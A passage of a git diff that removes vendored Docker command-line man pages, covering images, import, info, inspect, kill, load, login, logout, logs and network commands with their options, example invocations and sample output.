SYNOPSIS -**docker images** -[**--help**] -[**-a**|**--all**] -[**--digests**] -[**-f**|**--filter**[=*[]*]] -[**--format**=*"TEMPLATE"*] -[**--no-trunc**] -[**-q**|**--quiet**] -[REPOSITORY[:TAG]] - -# DESCRIPTION -This command lists the images stored in the local Docker repository. - -By default, intermediate images, used during builds, are not listed. Some of the -output, e.g., image ID, is truncated, for space reasons. However the truncated -image ID, and often the first few characters, are enough to be used in other -Docker commands that use the image ID. The output includes repository, tag, image -ID, date created and the virtual size. - -The title REPOSITORY for the first title may seem confusing. It is essentially -the image name. However, because you can tag a specific image, and multiple tags -(image instances) can be associated with a single name, the name is really a -repository for all tagged images of the same name. For example consider an image -called fedora. It may be tagged with 18, 19, or 20, etc. to manage different -versions. - -# OPTIONS -**-a**, **--all**=*true*|*false* - Show all images (by default filter out the intermediate image layers). The default is *false*. - -**--digests**=*true*|*false* - Show image digests. The default is *false*. - -**-f**, **--filter**=[] - Filters the output based on these conditions: - - dangling=(true|false) - find unused images - - label= or label== - - before=([:tag]||) - - since=([:tag]||) - -**--format**="*TEMPLATE*" - Pretty-print images using a Go template. - Valid placeholders: - .ID - Image ID - .Repository - Image repository - .Tag - Image tag - .Digest - Image digest - .CreatedSince - Elapsed time since the image was created - .CreatedAt - Time when the image was created - .Size - Image disk size - -**--help** - Print usage statement - -**--no-trunc**=*true*|*false* - Don't truncate output. The default is *false*. - -**-q**, **--quiet**=*true*|*false* - Only show numeric IDs. The default is *false*. - -# EXAMPLES - -## Listing the images - -To list the images in a local repository (not the registry) run: - - docker images - -The list will contain the image repository name, a tag for the image, and an -image ID, when it was created and its virtual size. Columns: REPOSITORY, TAG, -IMAGE ID, CREATED, and SIZE. - -The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument -that restricts the list to images that match the argument. If you specify -`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the -given repository. - - docker images java - -The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example, -`docker images jav` does not match the image `java`. - -If both `REPOSITORY` and `TAG` are provided, only images matching that -repository and tag are listed. To find all local images in the "java" -repository with tag "8" you can use: - - docker images java:8 - -To get a verbose list of images which contains all the intermediate images -used in builds use **-a**: - - docker images -a - -Previously, the docker images command supported the --tree and --dot arguments, -which displayed different visualizations of the image data. Docker core removed -this functionality in the 1.7 version. If you liked this functionality, you can -still find it in the third-party dockviz tool: https://github.com/justone/dockviz. - -## Listing images in a desired format - -When using the --format option, the image command will either output the data -exactly as the template declares or, when using the `table` directive, will -include column headers as well. You can use special characters like `\t` for -inserting tab spacing between columns. - -The following example uses a template without headers and outputs the ID and -Repository entries separated by a colon for all images: - - docker images --format "{{.ID}}: {{.Repository}}" - 77af4d6b9913: - b6fa739cedf5: committ - 78a85c484bad: ipbabble - 30557a29d5ab: docker - 5ed6274db6ce: - 746b819f315e: postgres - 746b819f315e: postgres - 746b819f315e: postgres - 746b819f315e: postgres - -To list all images with their repository and tag in a table format you can use: - - docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}" - IMAGE ID REPOSITORY TAG - 77af4d6b9913 - b6fa739cedf5 committ latest - 78a85c484bad ipbabble - 30557a29d5ab docker latest - 5ed6274db6ce - 746b819f315e postgres 9 - 746b819f315e postgres 9.3 - 746b819f315e postgres 9.3.5 - 746b819f315e postgres latest - -Valid template placeholders are listed above. - -## Listing only the shortened image IDs - -Listing just the shortened image IDs. This can be useful for some automated -tools. - - docker images -q - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-import.1.md b/vendor/github.com/docker/docker/man/docker-import.1.md deleted file mode 100644 index 43d65efe6a..0000000000 --- a/vendor/github.com/docker/docker/man/docker-import.1.md +++ /dev/null @@ -1,72 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-import - Create an empty filesystem image and import the contents of the tarball (.tar, .tar.gz, .tgz, .bzip, .tar.xz, .txz) into it, then optionally tag it. - -# SYNOPSIS -**docker import** -[**-c**|**--change**[=*[]*]] -[**-m**|**--message**[=*MESSAGE*]] -[**--help**] -file|URL|**-**[REPOSITORY[:TAG]] - -# OPTIONS -**-c**, **--change**=[] - Apply specified Dockerfile instructions while importing the image - Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` - -**--help** - Print usage statement - -**-m**, **--message**="" - Set commit message for imported image - -# DESCRIPTION -Create a new filesystem image from the contents of a tarball (`.tar`, -`.tar.gz`, `.tgz`, `.bzip`, `.tar.xz`, `.txz`) into it, then optionally tag it. - - -# EXAMPLES - -## Import from a remote location - - # docker import http://example.com/exampleimage.tgz example/imagerepo - -## Import from a local file - -Import to docker via pipe and stdin: - - # cat exampleimage.tgz | docker import - example/imagelocal - -Import with a commit message. - - # cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new - -Import to a Docker image from a local file. - - # docker import /path/to/exampleimage.tgz - - -## Import from a local file and tag - -Import to docker via pipe and stdin: - - # cat exampleimageV2.tgz | docker import - example/imagelocal:V-2.0 - -## Import from a local directory - - # tar -c . | docker import - exampleimagedir - -## Apply specified Dockerfile instructions while importing the image -This example sets the docker image ENV variable DEBUG to true by default. - - # tar -c . | docker import -c="ENV DEBUG true" - exampleimagedir - -# See also -**docker-export(1)** to export the contents of a filesystem as a tar archive to STDOUT. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-info.1.md b/vendor/github.com/docker/docker/man/docker-info.1.md deleted file mode 100644 index bb7a8fb4c2..0000000000 --- a/vendor/github.com/docker/docker/man/docker-info.1.md +++ /dev/null @@ -1,187 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-info - Display system-wide information - -# SYNOPSIS -**docker info** -[**--help**] -[**-f**|**--format**[=*FORMAT*]] - -# DESCRIPTION -This command displays system wide information regarding the Docker installation. -Information displayed includes the kernel version, number of containers and images. -The number of images shown is the number of unique images. The same image tagged -under different names is counted only once. - -If a format is specified, the given template will be executed instead of the -default format. Go's **text/template** package -describes all the details of the format. - -Depending on the storage driver in use, additional information can be shown, such -as pool name, data file, metadata file, data space used, total data space, metadata -space used, and total metadata space. - -The data file is where the images are stored and the metadata file is where the -meta data regarding those images are stored. When run for the first time Docker -allocates a certain amount of data space and meta data space from the space -available on the volume where `/var/lib/docker` is mounted. - -# OPTIONS -**--help** - Print usage statement - -**-f**, **--format**="" - Format the output using the given Go template - -# EXAMPLES - -## Display Docker system information - -Here is a sample output for a daemon running on Ubuntu, using the overlay2 -storage driver: - - $ docker -D info - Containers: 14 - Running: 3 - Paused: 1 - Stopped: 10 - Images: 52 - Server Version: 1.13.0 - Storage Driver: overlay2 - Backing Filesystem: extfs - Supports d_type: true - Native Overlay Diff: false - Logging Driver: json-file - Cgroup Driver: cgroupfs - Plugins: - Volume: local - Network: bridge host macvlan null overlay - Swarm: active - NodeID: rdjq45w1op418waxlairloqbm - Is Manager: true - ClusterID: te8kdyw33n36fqiz74bfjeixd - Managers: 1 - Nodes: 2 - Orchestration: - Task History Retention Limit: 5 - Raft: - Snapshot Interval: 10000 - Number of Old Snapshots to Retain: 0 - Heartbeat Tick: 1 - Election Tick: 3 - Dispatcher: - Heartbeat Period: 5 seconds - CA Configuration: - Expiry Duration: 3 months - Node Address: 172.16.66.128 172.16.66.129 - Manager Addresses: - 172.16.66.128:2477 - Runtimes: runc - Default Runtime: runc - Init Binary: docker-init - containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531 - runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2 - init version: N/A (expected: v0.13.0) - Security Options: - apparmor - seccomp - Profile: default - Kernel Version: 4.4.0-31-generic - Operating System: Ubuntu 16.04.1 LTS - OSType: linux - Architecture: x86_64 - CPUs: 2 - Total Memory: 1.937 GiB - Name: ubuntu - ID: H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326 - Docker Root Dir: /var/lib/docker - Debug Mode (client): true - Debug Mode (server): true - File Descriptors: 30 - Goroutines: 123 - System Time: 2016-11-12T17:24:37.955404361-08:00 - EventsListeners: 0 - Http Proxy: http://test:test@proxy.example.com:8080 - Https Proxy: https://test:test@proxy.example.com:8080 - No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com - Registry: https://index.docker.io/v1/ - WARNING: No swap limit support - Labels: - storage=ssd - staging=true - Experimental: false - Insecure Registries: - 127.0.0.0/8 - Registry Mirrors: - http://192.168.1.2/ - http://registry-mirror.example.com:5000/ - Live Restore Enabled: false - - - -The global `-D` option tells all `docker` commands to output debug information. - -The example below shows the output for a daemon running on Red Hat Enterprise Linux, -using the devicemapper storage driver. As can be seen in the output, additional -information about the devicemapper storage driver is shown: - - $ docker info - Containers: 14 - Running: 3 - Paused: 1 - Stopped: 10 - Untagged Images: 52 - Server Version: 1.10.3 - Storage Driver: devicemapper - Pool Name: docker-202:2-25583803-pool - Pool Blocksize: 65.54 kB - Base Device Size: 10.74 GB - Backing Filesystem: xfs - Data file: /dev/loop0 - Metadata file: /dev/loop1 - Data Space Used: 1.68 GB - Data Space Total: 107.4 GB - Data Space Available: 7.548 GB - Metadata Space Used: 2.322 MB - Metadata Space Total: 2.147 GB - Metadata Space Available: 2.145 GB - Udev Sync Supported: true - Deferred Removal Enabled: false - Deferred Deletion Enabled: false - Deferred Deleted Device Count: 0 - Data loop file: /var/lib/docker/devicemapper/devicemapper/data - Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata - Library Version: 1.02.107-RHEL7 (2015-12-01) - Execution Driver: native-0.2 - Logging Driver: json-file - Plugins: - Volume: local - Network: null host bridge - Kernel Version: 3.10.0-327.el7.x86_64 - Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo) - OSType: linux - Architecture: x86_64 - CPUs: 1 - Total Memory: 991.7 MiB - Name: ip-172-30-0-91.ec2.internal - ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S - Docker Root Dir: /var/lib/docker - Debug mode (client): false - Debug mode (server): false - Username: gordontheturtle - Registry: https://index.docker.io/v1/ - Insecure registries: - myinsecurehost:5000 - 127.0.0.0/8 - -You can also specify the output format: - - $ docker info --format '{{json .}}' - {"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...} - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-inspect.1.md b/vendor/github.com/docker/docker/man/docker-inspect.1.md deleted file mode 100644 index 21d7ba678a..0000000000 --- a/vendor/github.com/docker/docker/man/docker-inspect.1.md +++ /dev/null @@ -1,323 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-inspect - Return low-level information on docker objects - -# SYNOPSIS -**docker inspect** -[**--help**] -[**-f**|**--format**[=*FORMAT*]] -[**-s**|**--size**] -[**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume*] -NAME|ID [NAME|ID...] - -# DESCRIPTION - -This displays the low-level information on Docker object(s) (e.g. container, -image, volume,network, node, service, or task) identified by name or ID. By default, -this will render all results in a JSON array. If the container and image have -the same name, this will return container JSON for unspecified type. If a format -is specified, the given template will be executed for each result. - -# OPTIONS -**--help** - Print usage statement - -**-f**, **--format**="" - Format the output using the given Go template - -**-s**, **--size** - Display total file sizes if the type is container - -**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume* - Return JSON for specified type, permissible values are "image", "container", - "network", "node", "service", "task", and "volume" - -# EXAMPLES - -Get information about an image when image name conflicts with the container name, -e.g. both image and container are named rhel7: - - $ docker inspect --type=image rhel7 - [ - { - "Id": "fe01a428b9d9de35d29531e9994157978e8c48fa693e1bf1d221dffbbb67b170", - "Parent": "10acc31def5d6f249b548e01e8ffbaccfd61af0240c17315a7ad393d022c5ca2", - .... - } - ] - -## Getting information on a container - -To get information on a container use its ID or instance name: - - $ docker inspect d2cc496561d6 - [{ - "Id": "d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47", - "Created": "2015-06-08T16:18:02.505155285Z", - "Path": "bash", - "Args": [], - "State": { - "Running": false, - "Paused": false, - "Restarting": false, - "OOMKilled": false, - "Dead": false, - "Pid": 0, - "ExitCode": 0, - "Error": "", - "StartedAt": "2015-06-08T16:18:03.643865954Z", - "FinishedAt": "2015-06-08T16:57:06.448552862Z" - }, - "Image": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", - "NetworkSettings": { - "Bridge": "", - "SandboxID": "6b4851d1903e16dd6a567bd526553a86664361f31036eaaa2f8454d6f4611f6f", - "HairpinMode": false, - "LinkLocalIPv6Address": "", - "LinkLocalIPv6PrefixLen": 0, - "Ports": {}, - "SandboxKey": "/var/run/docker/netns/6b4851d1903e", - "SecondaryIPAddresses": null, - "SecondaryIPv6Addresses": null, - "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", - "Gateway": "172.17.0.1", - "GlobalIPv6Address": "", - "GlobalIPv6PrefixLen": 0, - "IPAddress": "172.17.0.2", - "IPPrefixLen": 16, - "IPv6Gateway": "", - "MacAddress": "02:42:ac:12:00:02", - "Networks": { - "bridge": { - "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", - "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", - "Gateway": "172.17.0.1", - "IPAddress": "172.17.0.2", - "IPPrefixLen": 16, - "IPv6Gateway": "", - "GlobalIPv6Address": "", - "GlobalIPv6PrefixLen": 0, - "MacAddress": "02:42:ac:12:00:02" - } - } - - }, - "ResolvConfPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/resolv.conf", - "HostnamePath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hostname", - "HostsPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hosts", - "LogPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47-json.log", - "Name": "/adoring_wozniak", - "RestartCount": 0, - "Driver": "devicemapper", - "MountLabel": "", - "ProcessLabel": "", - "Mounts": [ - { - "Source": "/data", - "Destination": "/data", - "Mode": "ro,Z", - "RW": false - "Propagation": "" - } - ], - "AppArmorProfile": "", - "ExecIDs": null, - "HostConfig": { - "Binds": null, - "ContainerIDFile": "", - "Memory": 0, - "MemorySwap": 0, - "CpuShares": 0, - "CpuPeriod": 0, - "CpusetCpus": "", - "CpusetMems": "", - "CpuQuota": 0, - "BlkioWeight": 0, - "OomKillDisable": false, - "Privileged": false, - "PortBindings": {}, - "Links": null, - "PublishAllPorts": false, - "Dns": null, - "DnsSearch": null, - "DnsOptions": null, - "ExtraHosts": null, - "VolumesFrom": null, - "Devices": [], - "NetworkMode": "bridge", - "IpcMode": "", - "PidMode": "", - "UTSMode": "", - "CapAdd": null, - "CapDrop": null, - "RestartPolicy": { - "Name": "no", - "MaximumRetryCount": 0 - }, - "SecurityOpt": null, - "ReadonlyRootfs": false, - "Ulimits": null, - "LogConfig": { - "Type": "json-file", - "Config": {} - }, - "CgroupParent": "" - }, - "GraphDriver": { - "Name": "devicemapper", - "Data": { - "DeviceId": "5", - "DeviceName": "docker-253:1-2763198-d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47", - "DeviceSize": "171798691840" - } - }, - "Config": { - "Hostname": "d2cc496561d6", - "Domainname": "", - "User": "", - "AttachStdin": true, - "AttachStdout": true, - "AttachStderr": true, - "ExposedPorts": null, - "Tty": true, - "OpenStdin": true, - "StdinOnce": true, - "Env": null, - "Cmd": [ - "bash" - ], - "Image": "fedora", - "Volumes": null, - "VolumeDriver": "", - "WorkingDir": "", - "Entrypoint": null, - "NetworkDisabled": false, - "MacAddress": "", - "OnBuild": null, - "Labels": {}, - "Memory": 0, - "MemorySwap": 0, - "CpuShares": 0, - "Cpuset": "", - "StopSignal": "SIGTERM" - } - } - ] -## Getting the IP address of a container instance - -To get the IP address of a container use: - - $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' d2cc496561d6 - 172.17.0.2 - -## Listing all port bindings - -One can loop over arrays and maps in the results to produce simple text -output: - - $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} \ - {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' d2cc496561d6 - 80/tcp -> 80 - -You can get more information about how to write a Go template from: -https://golang.org/pkg/text/template/. - -## Getting size information on a container - - $ docker inspect -s d2cc496561d6 - [ - { - .... - "SizeRw": 0, - "SizeRootFs": 972, - .... - } - ] - -## Getting information on an image - -Use an image's ID or name (e.g., repository/name[:tag]) to get information -about the image: - - $ docker inspect ded7cd95e059 - [{ - "Id": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", - "Parent": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", - "Comment": "", - "Created": "2015-05-27T16:58:22.937503085Z", - "Container": "76cf7f67d83a7a047454b33007d03e32a8f474ad332c3a03c94537edd22b312b", - "ContainerConfig": { - "Hostname": "76cf7f67d83a", - "Domainname": "", - "User": "", - "AttachStdin": false, - "AttachStdout": false, - "AttachStderr": false, - "ExposedPorts": null, - "Tty": false, - "OpenStdin": false, - "StdinOnce": false, - "Env": null, - "Cmd": [ - "/bin/sh", - "-c", - "#(nop) ADD file:4be46382bcf2b095fcb9fe8334206b584eff60bb3fad8178cbd97697fcb2ea83 in /" - ], - "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", - "Volumes": null, - "VolumeDriver": "", - "WorkingDir": "", - "Entrypoint": null, - "NetworkDisabled": false, - "MacAddress": "", - "OnBuild": null, - "Labels": {} - }, - "DockerVersion": "1.6.0", - "Author": "Lokesh Mandvekar \u003clsm5@fedoraproject.org\u003e", - "Config": { - "Hostname": "76cf7f67d83a", - "Domainname": "", - "User": "", - "AttachStdin": false, - "AttachStdout": false, - "AttachStderr": false, - "ExposedPorts": null, - "Tty": false, - "OpenStdin": false, - "StdinOnce": false, - "Env": null, - "Cmd": null, - "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", - "Volumes": null, - "VolumeDriver": "", - "WorkingDir": "", - "Entrypoint": null, - "NetworkDisabled": false, - "MacAddress": "", - "OnBuild": null, - "Labels": {} - }, - "Architecture": "amd64", - "Os": "linux", - "Size": 186507296, - "VirtualSize": 186507296, - "GraphDriver": { - "Name": "devicemapper", - "Data": { - "DeviceId": "3", - "DeviceName": "docker-253:1-2763198-ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", - "DeviceSize": "171798691840" - } - } - } - ] - -# HISTORY -April 2014, originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -April 2015, updated by Qiang Huang -October 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-kill.1.md b/vendor/github.com/docker/docker/man/docker-kill.1.md deleted file mode 100644 index 36cbdb90ea..0000000000 --- a/vendor/github.com/docker/docker/man/docker-kill.1.md +++ /dev/null @@ -1,28 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-kill - Kill a running container using SIGKILL or a specified signal - -# SYNOPSIS -**docker kill** -[**--help**] -[**-s**|**--signal**[=*"KILL"*]] -CONTAINER [CONTAINER...] - -# DESCRIPTION - -The main process inside each container specified will be sent SIGKILL, - or any signal specified with option --signal. - -# OPTIONS -**--help** - Print usage statement - -**-s**, **--signal**="*KILL*" - Signal to send to the container - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) - based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-load.1.md b/vendor/github.com/docker/docker/man/docker-load.1.md deleted file mode 100644 index b165173047..0000000000 --- a/vendor/github.com/docker/docker/man/docker-load.1.md +++ /dev/null @@ -1,56 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-load - Load an image from a tar archive or STDIN - -# SYNOPSIS -**docker load** -[**--help**] -[**-i**|**--input**[=*INPUT*]] -[**-q**|**--quiet**] - -# DESCRIPTION - -Loads a tarred repository from a file or the standard input stream. -Restores both images and tags. Write image names or IDs imported it -standard output stream. - -# OPTIONS -**--help** - Print usage statement - -**-i**, **--input**="" - Read from a tar archive file, instead of STDIN. The tarball may be compressed with gzip, bzip, or xz. - -**-q**, **--quiet** - Suppress the load progress bar but still outputs the imported images. - -# EXAMPLES - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox latest 769b9341d937 7 weeks ago 2.489 MB - $ docker load --input fedora.tar - # […] - Loaded image: fedora:rawhide - # […] - Loaded image: fedora:20 - # […] - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox latest 769b9341d937 7 weeks ago 2.489 MB - fedora rawhide 0d20aec6529d 7 weeks ago 387 MB - fedora 20 58394af37342 7 weeks ago 385.5 MB - fedora heisenbug 58394af37342 7 weeks ago 385.5 MB - fedora latest 58394af37342 7 weeks ago 385.5 MB - -# See also -**docker-save(1)** to save one or more images to a tar archive (streamed to STDOUT by default). - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -July 2015 update by Mary Anthony -June 2016 update by Vincent Demeester diff --git a/vendor/github.com/docker/docker/man/docker-login.1.md b/vendor/github.com/docker/docker/man/docker-login.1.md deleted file mode 100644 index c0d4f795db..0000000000 --- a/vendor/github.com/docker/docker/man/docker-login.1.md +++ /dev/null @@ -1,53 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-login - Log in to a Docker registry. - -# SYNOPSIS -**docker login** -[**--help**] -[**-p**|**--password**[=*PASSWORD*]] -[**-u**|**--username**[=*USERNAME*]] -[SERVER] - -# DESCRIPTION -Log in to a Docker Registry located on the specified -`SERVER`. You can specify a URL or a `hostname` for the `SERVER` value. If you -do not specify a `SERVER`, the command uses Docker's public registry located at -`https://registry-1.docker.io/` by default. To get a username/password for Docker's public registry, create an account on Docker Hub. - -`docker login` requires user to use `sudo` or be `root`, except when: - -1. connecting to a remote daemon, such as a `docker-machine` provisioned `docker engine`. -2. user is added to the `docker` group. This will impact the security of your system; the `docker` group is `root` equivalent. See [Docker Daemon Attack Surface](https://docs.docker.com/engine/articles/security/#docker-daemon-attack-surface) for details. - -You can log into any public or private repository for which you have -credentials. When you log in, the command stores encoded credentials in -`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows. - -# OPTIONS -**--help** - Print usage statement - -**-p**, **--password**="" - Password - -**-u**, **--username**="" - Username - -# EXAMPLES - -## Login to a registry on your localhost - - # docker login localhost:8080 - -# See also -**docker-logout(1)** to log out from a Docker registry. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 -November 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-logout.1.md b/vendor/github.com/docker/docker/man/docker-logout.1.md deleted file mode 100644 index a8a4b7c3c0..0000000000 --- a/vendor/github.com/docker/docker/man/docker-logout.1.md +++ /dev/null @@ -1,32 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-logout - Log out from a Docker registry. - -# SYNOPSIS -**docker logout** -[SERVER] - -# DESCRIPTION -Log out of a Docker Registry located on the specified `SERVER`. You can -specify a URL or a `hostname` for the `SERVER` value. If you do not specify a -`SERVER`, the command attempts to log you out of Docker's public registry -located at `https://registry-1.docker.io/` by default. - -# OPTIONS -There are no available options. - -# EXAMPLES - -## Log out from a registry on your localhost - - # docker logout localhost:8080 - -# See also -**docker-login(1)** to log in to a Docker registry server. - -# HISTORY -June 2014, Originally compiled by Daniel, Dao Quang Minh (daniel at nitrous dot io) -July 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 diff --git a/vendor/github.com/docker/docker/man/docker-logs.1.md b/vendor/github.com/docker/docker/man/docker-logs.1.md deleted file mode 100644 index e70f796e28..0000000000 --- a/vendor/github.com/docker/docker/man/docker-logs.1.md +++ /dev/null @@ -1,71 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-logs - Fetch the logs of a container - -# SYNOPSIS -**docker logs** -[**-f**|**--follow**] -[**--help**] -[**--since**[=*SINCE*]] -[**-t**|**--timestamps**] -[**--tail**[=*"all"*]] -CONTAINER - -# DESCRIPTION -The **docker logs** command batch-retrieves whatever logs are present for -a container at the time of execution. This does not guarantee execution -order when combined with a docker run (i.e., your run may not have generated -any logs at the time you execute docker logs). - -The **docker logs --follow** command combines commands **docker logs** and -**docker attach**. It will first return all logs from the beginning and -then continue streaming new output from the container's stdout and stderr. - -**Warning**: This command works only for the **json-file** or **journald** -logging drivers. - -# OPTIONS -**--help** - Print usage statement - -**--details**=*true*|*false* - Show extra details provided to logs - -**-f**, **--follow**=*true*|*false* - Follow log output. The default is *false*. - -**--since**="" - Show logs since timestamp - -**-t**, **--timestamps**=*true*|*false* - Show timestamps. The default is *false*. - -**--tail**="*all*" - Output the specified number of lines at the end of logs (defaults to all logs) - -The `--since` option can be Unix timestamps, date formatted timestamps, or Go -duration strings (e.g. `10m`, `1h30m`) computed relative to the client machine's -time. Supported formats for date formatted time stamps include RFC3339Nano, -RFC3339, `2006-01-02T15:04:05`, `2006-01-02T15:04:05.999999999`, -`2006-01-02Z07:00`, and `2006-01-02`. The local timezone on the client will be -used if you do not provide either a `Z` or a `+-00:00` timezone offset at the -end of the timestamp. When providing Unix timestamps enter -seconds[.nanoseconds], where seconds is the number of seconds that have elapsed -since January 1, 1970 (midnight UTC/GMT), not counting leap seconds (aka Unix -epoch or Unix time), and the optional .nanoseconds field is a fraction of a -second no more than nine digits long. You can combine the `--since` option with -either or both of the `--follow` or `--tail` options. - -The `docker logs --details` command will add on extra attributes, such as -environment variables and labels, provided to `--log-opt` when creating the -container. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -July 2014, updated by Sven Dowideit -April 2015, updated by Ahmet Alp Balkan -October 2015, updated by Mike Brown diff --git a/vendor/github.com/docker/docker/man/docker-network-connect.1.md b/vendor/github.com/docker/docker/man/docker-network-connect.1.md deleted file mode 100644 index 096ec77a4d..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-connect.1.md +++ /dev/null @@ -1,66 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-connect - connect a container to a network - -# SYNOPSIS -**docker network connect** -[**--help**] -NETWORK CONTAINER - -# DESCRIPTION - -Connects a container to a network. You can connect a container by name -or by ID. Once connected, the container can communicate with other containers in -the same network. - -```bash -$ docker network connect multi-host-network container1 -``` - -You can also use the `docker run --network=` option to start a container and immediately connect it to a network. - -```bash -$ docker run -itd --network=multi-host-network --ip 172.20.88.22 --ip6 2001:db8::8822 busybox -``` -You can pause, restart, and stop containers that are connected to a network. -A container connects to its configured networks when it runs. - -If specified, the container's IP address(es) is reapplied when a stopped -container is restarted. If the IP address is no longer available, the container -fails to start. One way to guarantee that the IP address is available is -to specify an `--ip-range` when creating the network, and choose the static IP -address(es) from outside that range. This ensures that the IP address is not -given to another container while this container is not on the network. - -```bash -$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network -``` - -```bash -$ docker network connect --ip 172.20.128.2 multi-host-network container2 -``` - -To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network. - -Once connected in network, containers can communicate using only another -container's IP address or name. For `overlay` networks or custom plugins that -support multi-host connectivity, containers connected to the same multi-host -network but launched from different Engines can also communicate in this way. - -You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks. - - -# OPTIONS -**NETWORK** - Specify network name - -**CONTAINER** - Specify container name - -**--help** - Print usage statement - -# HISTORY -OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-create.1.md b/vendor/github.com/docker/docker/man/docker-network-create.1.md deleted file mode 100644 index 44ce8e15c2..0000000000 --- a/vendor/github.com/docker/docker/man/docker-network-create.1.md +++ /dev/null @@ -1,187 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% OCT 2015 -# NAME -docker-network-create - create a new network - -# SYNOPSIS -**docker network create** -[**--attachable**] -[**--aux-address**=*map[]*] -[**-d**|**--driver**=*DRIVER*] -[**--gateway**=*[]*] -[**--help**] -[**--internal**] -[**--ip-range**=*[]*] -[**--ipam-driver**=*default*] -[**--ipam-opt**=*map[]*] 